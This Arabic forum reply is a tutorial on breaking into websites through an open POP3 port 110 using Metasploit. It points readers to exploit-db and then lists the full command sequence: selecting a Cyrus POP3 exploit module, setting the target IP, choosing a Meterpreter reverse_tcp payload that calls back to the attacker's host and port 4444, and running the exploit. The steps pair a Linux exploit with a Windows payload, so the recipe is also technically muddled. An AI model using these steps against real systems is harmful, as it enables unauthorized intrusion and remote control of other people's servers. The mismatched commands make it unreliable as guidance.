السلام عليكم

إختراق المواقع عنطريق البورت ممكن بمشروع المتاسبلويت الموجود بالباك تراك

بس لازم تعرف طريقة الإستغلال وهل البورت الموفتوح به ثغرة أو لا

بالنسبة للبحث عن الثغرات لها مواقعها مثل

http://www.exploit-db.com/search/

يكفي تحط البورت والثغرات التي تريدها مواقع أجهزة ,,, وهو يعطيك أحدث الثغرات

الأن بالنسبة للفحص اللي عامله لاحظة وجود البورت 110 الخاص بمنفذ pop3 مفتوح ويمكن إستغلاله عنطريق المتا سبلويت

استغلالها كالتالي

بعد فتح المتاسبلويت

ضع الامر search pop3

ورح يظهر لك الاستغلالها المتوفرة

اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا

use linux/pop3/cyrus_pop3d_popsubfolders

ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم

عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت

البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ
110 مفتوح

نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر

set RHOST xx.xxx.xxx.xxx

xx.xxx.xxx.xxx:أيبي الموقع

ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx اي بي جهاز المهاجم

set LPORT 4444 بورت مفتوح في جهاز المهاجم

ومن ثم امر الاستغلال exploit

يمكن هذه قديمة يوجد افضل منها فقط انت وبحثك

بالتوفيق